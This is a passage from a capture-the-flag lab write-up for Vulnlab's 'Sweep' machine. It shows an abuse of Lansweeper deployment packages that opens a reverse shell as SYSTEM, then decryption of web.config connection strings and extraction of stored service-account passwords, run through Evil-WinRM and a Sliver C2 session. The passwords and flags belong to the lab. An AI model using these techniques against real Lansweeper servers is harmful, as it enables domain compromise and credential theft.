We return to Deployment > Deployment packages, click on our package Remote - Shell then click on Deploy now and fill/select as below:

image

Before click on the Ok button, we set our Netcat listener on our attacker machine:

$ rlwrap -cAr nc -lvnp 443  
listening on [any] 443 ...

Then click on Ok and confirm with Yes:

image

We got our shell as SYSTEM:

$ rlwrap -cAr nc -lvnp 443  
listening on [any] 443 ...

connect to [10.8.4.253] from (UNKNOWN) [10.10.115.23] 56310
PS C:\Windows\system32> whoami
nt authority\system

So we can grab the flag Sweep_Root:

PS C:\Windows\system32> type c:\users\administrator\desktop\root.txt
VL{06a6c584a3492df1807f1d7c4de0ec56}

Unintended way - web.config

In our WinRM session with svc_inventory_lnx, we can see the presence of web.config in C:\Program Files (x86)\Lansweeper\Website\:

*Evil-WinRM* PS C:\Program Files (x86)\Lansweeper\Website> dir


    Directory: C:\Program Files (x86)\Lansweeper\Website


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          2/8/2024  11:46 AM                actions
d-----          2/8/2024  11:53 AM                App_Data
d-----          2/8/2024  11:46 AM                Asset
d-----          2/8/2024  11:46 AM                AssetPictures
d-----          2/8/2024  11:46 AM                Assets
d-----          2/8/2024  11:47 AM                bin
d-----          2/8/2024  11:47 AM                Cache
d-----          2/8/2024  11:47 AM                Calendar
d-----          2/8/2024  11:47 AM                cleditor
d-----          2/8/2024  11:47 AM                configuration
d-----          2/8/2024  11:47 AM                css
d-----          2/8/2024  11:47 AM                customdata
d-----          2/8/2024  11:47 AM                DataDictionary
d-----          2/8/2024  11:47 AM                deployment
d-----          2/8/2024  11:46 AM                DOCS
d-----          2/8/2024  11:47 AM                Firstrun
d-----          2/8/2024  11:47 AM                fonts
d-----          2/8/2024  11:47 AM                fullcalendar
d-----          2/8/2024  11:47 AM                helpdesk
d-----          2/8/2024  11:53 AM                images
d-----          2/8/2024  11:47 AM                img
d-----          2/8/2024  11:47 AM                js
d-----          2/8/2024  11:46 AM                kbs_index
d-----          2/8/2024  11:47 AM                Knowledgebase
d-----          2/8/2024  11:47 AM                lang
d-----          2/8/2024  11:47 AM                MainMaster
d-----          2/8/2024  11:47 AM                Prerequisites
d-----          2/8/2024  11:47 AM                Report
d-----          2/8/2024  11:47 AM                Scanning
d-----          2/8/2024  11:47 AM                Software
d-----          2/8/2024  11:47 AM                templates
d-----          2/8/2024  11:46 AM                tickets_index
d-----          2/8/2024  11:47 AM                User
d-----          2/8/2024  11:47 AM                userpictures
d-----          2/8/2024  11:47 AM                vendors
d-----          2/8/2024  11:47 AM                Widgets
d-----          2/8/2024  11:47 AM                WidgetsCustom
-a----         1/29/2024   5:49 PM             86 404.aspx
-a----         1/29/2024   5:49 PM             86 500.aspx
-a----         1/29/2024   5:49 PM             86 AddTabs.aspx
-a----         1/29/2024   5:49 PM             86 api.aspx
-a----         1/29/2024   5:49 PM             86 asset.aspx
-a----         1/29/2024   5:49 PM             86 AssetActions.aspx
...
-a----          2/8/2024  11:53 AM           6339 web.config
...
*Evil-WinRM* PS C:\Program Files (x86)\Lansweeper\Website> type web.config
<?xml version="1.0" encoding="utf-8"?>
<configuration>
	<configSections>
		<section name="featureToggles" type="System.Configuration.AppSettingsSection, System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"/>
	</configSections>
	<appSettings>
		<add key="DirectoryJS" value="js/release/"/>
		<add key="DirectoryCSS" value="css/"/>
		<add key="aspnet:MaxJsonDeserializerMembers" value="990000"/>
		<add key="HdUpdateThread" value="1"/>
	</appSettings>
	<connectionStrings configProtectionProvider="DataProtectionConfigurationProvider">
  <EncryptedData>
   <CipherData>
    <CipherValue>AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAgzIANE59TESof+KDtzRrYgQAAAACAAAAAAAQZgAAAAEAACAAAADZXXb0nohQo/8w0EjMuxtdrsO+oWE/8nDm/sEaWGOh3wAAAAAOgAAAAAIAACAAAACklghdDLbVFPEM7B4ZpcRybvQgCHDDtgwAAeT5KyzVWtACAADAF3FYUr4SCYc5HSnHnnc6kNS4Rfc09lvTGIzwlOXXrMq2BXQ2rAKsHAKs6u4MLg7AbsuSQ5uXFoLv5gq+G7I7lLKnkjwZtj9q74RubSt1adkMEftUASe1UXOKoZMzjfSat7c80do1he16BvzrxMq4WZ9CMUt7L6oGYCGHLHKWClFNDfCjZpp1nqZMcEylVkz5zgayHZYhAW9C4+NATr+QLm1EGKNeZUmyW+oLkOkuvlj4OLonw1OY8DVMafH0MWY0tRmiFYwVzRpydb0Cw2Ms1rRy9EdLB570Qb45LVE4DqM43oHepfC+dqg0qScPdHxLdtHcWyeKgSlEHvML5kn/9G9g5DCX9QCtTgfVKU30A8zlc1BMYAn9Th0EEUW3UXHRMu+w1QAQmoeCcRN1V0LTtmjvEHazumgtfBXElHKvU3brBJDvyCHtGY9GVXs/Mhn5X9JrLYuP26Tx00vhfRd+jWuiiIVZarLSf/ZPVjBoKQQzHU6S2Aj2IV3tG7vdnrqPScIj3lhCeLhjEEAlLkdOoBefaeIST02PqWYTH6+mQODIp1XeWkhpCYN5ZFZG/vCdy938e159Cz2Bs57JQ7/3gY+RXbXth6/AqK3aiwfxc2qWAnpUazIS8ZYppqnwYSwXOoGtF1N8qUrOO3xYIyC23SgtpsnRibGNPauCzkryg+oQ0kSBYyQsVfUzhgPsXkdhvEPC7yVJ0cfbqYun/Mv00opCSYM0dOMvqaljKFoeraDIlqEqSJwouD80YXVPRhRnajr6hzTUVrMXlXImbWev4NAAjilyjQs3BYGJy5nbx1mkNn9AeWlInBFkmV0oLwy++Ap8tShR6CZoxv6OiR04W5pCAUYxdgERr/aQXvSVXFL2apxfE+oHxSDrzzH9bI82eejiDgjI4PqBrBet+3tMDvGsfjGwElWiy7OfMfhOjgTgggF4SVMYbyWUVGo6gF1AAAAAMOQYm/6r5L1Mzd7iM4dfwt6qqImlYluj/3j03jq2X+4ChPcl4wD9LM5ph9aYnTRNeRHLUeXHvPonZNpB304iLg==</CipherValue>
   </CipherData>
  </EncryptedData>
 </connectionStrings>
	<runtime>
		<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
			<dependentAssembly>
				<assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral"/>
				<bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0"/>
			</dependentAssembly>
			<dependentAssembly>
				<assemblyIdentity name="log4net" publicKeyToken="669e0ddf0bb1aa2a" culture="neutral"/>
				<bindingRedirect oldVersion="0.0.0.0-2.0.8.0" newVersion="2.0.8.0"/>
			</dependentAssembly>
		</assemblyBinding>
	</runtime>
	<system.web>
		<httpRuntime maxRequestLength="201900" executionTimeout="600" requestValidationMode="2.0" enableVersionHeader="false"/>
		<authentication mode="Windows"/>
		<identity impersonate="false"/>
		<compilation debug="false" defaultLanguage="C#" strict="false" explicit="true" targetFramework="4.0">
			<assemblies>
				<remove assembly="Microsoft.VisualStudio.Web.PageInspector.Loader, Version=1.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"/>
				<remove assembly="System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089"/>
				<remove assembly="System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089"/>
				<remove assembly="System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089"/>
				<remove assembly="System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089"/>
				<remove assembly="System.DirectoryServices.AccountManagement, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089"/>
				<add assembly="System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089"/>
				<add assembly="System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089"/>
				<add assembly="System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089"/>
				<add assembly="System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089"/>
				<add assembly="System.DirectoryServices.AccountManagement, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089"/>
			</assemblies>
		</compilation>
		<httpCookies httpOnlyCookies="true" sameSite="Strict"/>
		<sessionState cookieSameSite="Strict"/>
	</system.web>
	<system.webServer>
		<validation validateIntegratedModeConfiguration="false"/>
		<security>
			<requestFiltering>
				<verbs allowUnlisted="true">
					<add verb="TRACE" allowed="false"/>
					<add verb="OPTIONS" allowed="false"/>
				</verbs>
				<hiddenSegments>
					<add segment="templatefiles"/>
					<add segment="DOCS"/>
				</hiddenSegments>
				<requestLimits maxAllowedContentLength="1147483648"/>
			</requestFiltering>
		</security>
		<httpErrors errorMode="Custom">
			<remove statusCode="404"/>
			<error statusCode="404" path="/404.aspx" responseMode="ExecuteURL"/>
			<remove statusCode="500"/>
			<error statusCode="500" path="/500.aspx" responseMode="ExecuteURL"/>
		</httpErrors>
		<staticContent>
			<clientCache cacheControlMode="UseMaxAge" cacheControlMaxAge="1.00:00:00"/>
		</staticContent>
		<httpProtocol>
			<customHeaders>
				<remove name="X-Powered-By"/>
			</customHeaders>
		</httpProtocol>
	</system.webServer>
	<location path="api.aspx">
		<system.webServer>
			<security>
				<authentication>
					<anonymousAuthentication enabled="true"/>
				</authentication>
			</security>
		</system.webServer>
		<system.web>
			<authorization>
				<allow users="*"/>
			</authorization>
		</system.web>
	</location>
	<system.codedom>
		<compilers>
			<compiler extension=".cs" language="c#;cs;csharp" warningLevel="4" compilerOptions="/langversion:7.3 /nowarn:1659;1699;1701;612;618" type="Microsoft.CodeDom.Providers.DotNetCompilerPlatform.CSharpCodeProvider, Microsoft.CodeDom.Providers.DotNetCompilerPlatform, Version=3.6.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"/>
			<compiler extension=".vb" language="vb;vbs;visualbasic;vbscript" warningLevel="4" compilerOptions="/langversion:default /nowarn:41008,40000,40008 /define:_MYTYPE=\&quot;Web\&quot; /optionInfer+" type="Microsoft.CodeDom.Providers.DotNetCompilerPlatform.VBCodeProvider, Microsoft.CodeDom.Providers.DotNetCompilerPlatform, Version=3.6.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"/>
		</compilers>
	</system.codedom>
</configuration>

We have both the encrypted password and the encryption key in C:\Program Files (x86)\Lansweeper\Key\Encryption.txt.

The database connection strings contained within Lansweeper’s web.config (encrypted).

Manually, with the read-access to the installation folder we can decrypt the db connection strings from the web.config file then connect to the localdb, dump the configured credentials and also decrypt them:

Sample:

PS C:\Users\commando\Downloads\LansweeperPasswordRecovery-master\LansweeperPasswordRecovery-master\LPR6\bin\Debug > .\Lansweeper6_PasswordRecovery.exe .\Encryption.txt .\users.txt
[*] Processing files .\Encryption.txt, .\users.txt.
[*] Loading key file .\Encryption.txt.
[*] Processing 1024 bytes for the key file.
[*] Loading cipher file .\users.txt
[*] Loading cipher line svc_inventory_win:peGaNnWWCtOze2S++8QxNdGh8O1OUwisKgokXzrlsLQ=
[*] Loading cipher line svc_inventory_lnx:fuVE63qSVMPbuSnYUdUE+MuRpn9t/PXyLnMUb4gfDew=
[-] Recovered password for user svc_inventory_win as 4^56!sK&}eA?
[-] Recovered password for user svc_inventory_lnx as 0|5m-U6?/uAX

We use Yeeb’s SharpLansweeperDecrypt for full automation and easier way:

391150687-36ae1a99-2c88-4a7a-b5f4-4a169bee4d26

$ git clone https://github.com/Yeeb1/SharpLansweeperDecrypt.git
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
*Evil-WinRM* PS C:\windows\tasks> iwr http://10.8.4.253/LansweeperDecrypt.ps1 -o LansweeperDecrypt.ps1
*Evil-WinRM* PS C:\windows\tasks> ./LansweeperDecrypt.ps1
[+] Loading web.config file...
[+] Found protected connectionStrings section. Decrypting...
[+] Decrypted connectionStrings section:
<connectionStrings>
    <add name="lansweeper" connectionString="Data Source=(localdb)\.\LSInstance;Initial Catalog=lansweeperdb;Integrated Security=False;User ID=lansweeperuser;Password=Uk2)Dw3!Wf1)Hh;Connect Timeout=10;Application Name=&quot;LsService Core .Net SqlClient Data Provider&quot;" providerName="System.Data.SqlClient" />
</connectionStrings>
[+] Opening connection to the database...
[+] Retrieving credentials from the database...
[+] Decrypting password for user: SNMP Community String
[+] Decrypting password for user:
[+] Decrypting password for user: SWEEP\svc_inventory_win
[+] Decrypting password for user: svc_inventory_lnx
[+] Credentials retrieved and decrypted successfully:

CredName          Username                Password
--------          --------                --------
SNMP-Private      SNMP Community String   private
Global SNMP                               public
Inventory Windows SWEEP\svc_inventory_win 4^56!sK&}eA?
Inventory Linux   svc_inventory_lnx       0|5m-U6?/uAX


[+] Database connection closed.

Found svc_inventory_win:4^56!sK&}eA?

As svc_inventory_win is a member of Domain Admins group then it can connect to the DC and we can grab the last flag:

$ nxc winrm inventory.sweep.vl -u 'svc_inventory_win' -p '4^56!sK&}eA?' -X 'type c:\users\administrator\desktop\root.txt'
WINRM       10.10.82.173    5985   INVENTORY        [*] Windows Server 2022 Build 20348 (name:INVENTORY) (domain:sweep.vl)
WINRM       10.10.82.173    5985   INVENTORY        [+] sweep.vl\svc_inventory_win:4^56!sK&}eA? (Pwn3d!)
WINRM       10.10.82.173    5985   INVENTORY        [+] Executed command (shell type: powershell)
WINRM       10.10.82.173    5985   INVENTORY        VL{06a6c584a3492df1807f1d7c4de0ec56}

We can also do it inside a Sliver C2 session:

sliver (maldev) > inline-execute-assembly tool/SharpLansweeperDecrypt.exe -

[*] Successfully executed inline-execute-assembly (coff-loader)
[*] Got output:
[+] Success - Wrote 12298 bytes to memory

╔═╗┬ ┬┌─┐┬─┐┌─┐╦  ┌─┐┌┐┌┌─┐┬ ┬┌─┐┌─┐┌─┐┌─┐┬─┐╔╦╗┌─┐┌─┐┬─┐┬ ┬┌─┐┌┬┐
╚═╗├─┤├─┤├┬┘├─┘║  ├─┤│││└─┐│││├┤ ├┤ ├─┘├┤ ├┬┘ ║║├┤ │  ├┬┘└┬┘├─┘ │
╚═╝┴ ┴┴ ┴┴└─┴  ╩═╝┴ ┴┘└┘└─┘└┴┘└─┘└─┘┴  └─┘┴└─═╩╝└─┘└─┘┴└─ ┴ ┴   ┴

[+] Loading web.config file...
[+] Decrypted connectionStrings section:
Using connectionString: Data Source=(localdb)\.\LSInstance;Initial Catalog=lansweeperdb;Integrated Security=False;User ID=lansweeperuser;Password=Uk2)Dw3!Wf1)Hh;Connect Timeout=10;Application Name="LsService Core .Net SqlClient Data Provider"
[+] Opening connection to the database...
[+] Retrieving credentials from the database...
[+] Credential decrypted successully
┌───────────────────────────────────────┐
│ Credential: SNMP-Private              │
│ Username:   SNMP Community String     │
│ Password:   private                   │
└───────────────────────────────────────┘
[+] Credential decrypted successully
┌───────────────────────────────────────┐
│ Credential: Global SNMP               │
│ Username:                             │
│ Password:   public                    │
└───────────────────────────────────────┘
[+] Credential decrypted successully
┌───────────────────────────────────────┐
│ Credential: Inventory Windows         │
│ Username:   SWEEP\svc_inventory_win   │
│ Password:   4^56!sK&}eA?              │
└───────────────────────────────────────┘
[+] Credential decrypted successully
┌───────────────────────────────────────┐
│ Credential: Inventory Linux           │
│ Username:   svc_inventory_lnx         │
│ Password:   0|5m-U6?/uAX              │
└───────────────────────────────────────┘
[+] Database connection closed.

[+] inlineExecute-Assembly Finished

We can also use aspnet_regiis.exe:

Extra

Challenge solved! Use this link to share it: https://api.vulnlab.com/api/v1/share?id=bfc3ad1e-52b0-43b0-8184-e2a3b5eac99b

GHVGqPAXwAA6cIK

Interesting post about the db decrypting part: